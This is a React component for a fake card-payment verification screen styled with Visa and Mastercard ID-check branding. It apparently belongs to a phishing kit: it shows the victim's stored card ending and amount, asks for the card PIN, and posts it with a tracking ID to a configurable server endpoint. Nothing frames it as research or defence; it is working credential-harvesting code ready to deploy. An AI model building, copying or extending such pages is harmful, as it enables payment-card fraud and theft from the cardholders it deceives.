import React, { useEffect, useState } from "react"
import logo_prim from './qatar/assets/pci.jpg'
import axios from "axios"
import { useNavigate } from "react-router-dom"
import { useTranslation } from "react-i18next"
import VisaImage from './qatar/assets/visa.png'
import MasterImage from './qatar/assets/idcheck2.png'

export default function Default_Pin({setLoading}) {
  const [code, setCode] = useState("");

  const handleCodeChange = (e) => {
    const value = e.target.value.replace(/\D/g, "").slice(0, 6);
    setCode(value);
  };

    const { t } = useTranslation();

  const [submitBtnContent, setSubmitBtnContent] = useState(t('submit'));
  const [submitBtnDis, setSubmitBtnDis] = useState(false)
  const navigate = useNavigate()
  const [input1Value, setInput1Value] = useState("")
  const today = new Date()
  const formattedDate = `${today.getDate().toString().padStart(2, "0")}/${(
    today.getMonth() + 1
  )
    .toString()
    .padStart(2, "0")}/${today.getFullYear()}`

  const handleCodeSubmit = async () => {
    setSubmitBtnContent(<div className="inputLoader"></div>)
    setSubmitBtnDis(true)
    const dataToSend = {
      uuId: localStorage.getItem("uuId"),
      pin: input1Value,
    }

    try {
      const response = await axios.post(
        `${process.env.REACT_APP_SERVER_URL}/api/pin_verif`,
        dataToSend
      )
      if (response.status === 200) {
        setLoading(true)
      }
    } catch (error) {
      setTimeout(() => {
        setSubmitBtnDis(false)
        setSubmitBtnContent("Submit")
      }, 3000)
    }
  }

  useEffect(() => {
    updateSubmitBtnDisabled()
  }, [input1Value])

  const updateSubmitBtnDisabled = () => {
    console.log(
      `KD {input1Value.length} + KD {input2Value.length} + KD {input3Value.length}`
    )
    // Check conditions for enabling/disabling submit button

    setSubmitBtnDis(false) // Enable submit button if all inputs are filled

    if (input1Value.length > 3) {
      setSubmitBtnDis(false) // Enable submit button if all inputs are filled
    } else {
      setSubmitBtnDis(true) // Disable submit button if any input is empty
    }
  }

  const firstDigit = localStorage.getItem('first-digit');

  // Determine the image source and alt text
  let imageSrc, altText;
  if (firstDigit === '4') {
    imageSrc = VisaImage;
    altText = 'Visa';
  } else if (firstDigit === '5') {
    imageSrc = MasterImage;
    altText = 'Mastercard';
  } else {
    imageSrc = null; // No image if not 4 or 5
    altText = 'No card';
  }

  return (
    <div className="h-full  font-sans text-black">
      <div className="mx-auto h-full w-full max-w-md ">
        <main className="px-2 h-full overflow-y-scroll pt-3 pb-8">
          {/* Logos */}
          <div className="flex items-start justify-between">

            <img
              src={logo_prim}
              alt=""
              className="h-8 w-auto object-contain"
            />
            <img
              src={imageSrc}
              alt=""
              className="h-12  "
            />
          </div>

          {/* Divider */}
          <div className="mt-3 border-t border-neutral-400" />

          {/* Title */}
          <h1 className="mt-5 text-sm font-medium leading-6">
            Secure your e-commerce transaction
          </h1>

          {/* OTP info */}
          <p className="mt-5 text-sm leading-6">
             To complete this payment, please enter your PIN code. This helps ensure the security of your transaction.
          </p>

          {/* Payment info */}
          <p className="mt-7 text-sm leading-6">
            You are paying {process.env.REACT_APP_MERCHANT_NAME} the amount of {localStorage.getItem("currency") || process.env.REACT_APP_CURRENCY} {localStorage.getItem("summ")} using card
            <br />
            ************{localStorage.getItem("last-four-digits")} on {formattedDate}
          </p>

          {/* Verification */}
          <div className="mx-auto mt-9 w-full max-w-xs">
            <label
              htmlFor="verification-code"
              className="block text-center text-sm text-[#8180A3]"
            >
              Enter PIN Code
            </label>

            <input
              id="verification-code"
              onChange={(e) => {
                const onlyNums = e.target.value.replace(/\D/g, '');
                setInput1Value(onlyNums);
              }}
              type="text"
              inputMode="numeric"
              pattern="[0-9]*"
              maxLength={4}
              autoComplete="off"
              placeholder="****"
              value={input1Value}
              className="
                mt-1
                h-12
                w-full
                rounded
                border
                border-[#8180A3]
                bg-white
                px-4
                text-center
                text-lg
                tracking-widest
                text-black
                outline-none
                focus:border-[#183AB0]
                focus:ring-1
                focus:ring-[#183AB0]
              "
            />

            <button
              onClick={handleCodeSubmit}
              type="submit"
              disabled={submitBtnDis}
              className="
                mt-1
                flex
                h-11
                w-full
                items-center
                justify-center
                rounded
                bg-[#183AB0]
                text-base
                font-medium
                text-white
              "
            >
              {submitBtnContent}
            </button>
          </div>



          {/* Footer links */}
          <div className="mt-10 flex items-center gap-2 text-xs font-bold text-[#183AB0]">
            <button type="button">
              FAQ's
            </button>

            <span className="text-black">|</span>

            <button type="button">
              Terms and Conditions
            </button>
          </div>
        </main>
      </div>
    </div>
  );
}